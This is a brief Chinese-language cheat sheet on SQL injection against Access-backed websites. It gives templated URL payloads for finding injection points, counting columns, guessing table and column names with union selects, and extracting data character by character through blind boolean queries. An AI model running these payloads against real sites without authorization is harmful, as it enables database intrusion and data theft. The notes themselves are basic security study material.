sql注入--access

access數據庫結構:

　　表名  -->  列名  -->  數據

access注入攻擊片斷

　　聯合查詢法:

　　　　(1)  判斷注入點:  ?id=1 and 1=1 ; ?id=1 and 1=2

　　　　(2)  猜解表長度:  ?id=1 order by 3

　　　　(3)  猜解表名:  ?id=1 union select 1,2,3 from 表名 

　　　　(4)  猜解列名:  ?id=1 union select  列名,2,3 from  表名

　　　　(5)  猜解數據

　　逐字猜解法:

　　　　(1)  查表：?id=1 and exists (select * from 表名)

　　　　(2)  查列：?id=1 and exists (select 列名 from 表名)

　　　　(3)  查數據：1.肯定長度

　　　　　　　　　　　　?id=1 and (select top 1 len(列名) from 表名)=5

　　　　　　　　　　2.肯定asc數據(asc編碼)　　　　

　　　　　　　　　　　　?id=1 and (select top 1 asc(mid(列名,位數,1)) from 表名)=97

　　其餘方法:

　　　　(1)字典文件收集（社工）

　　　　(2)Access偏移注入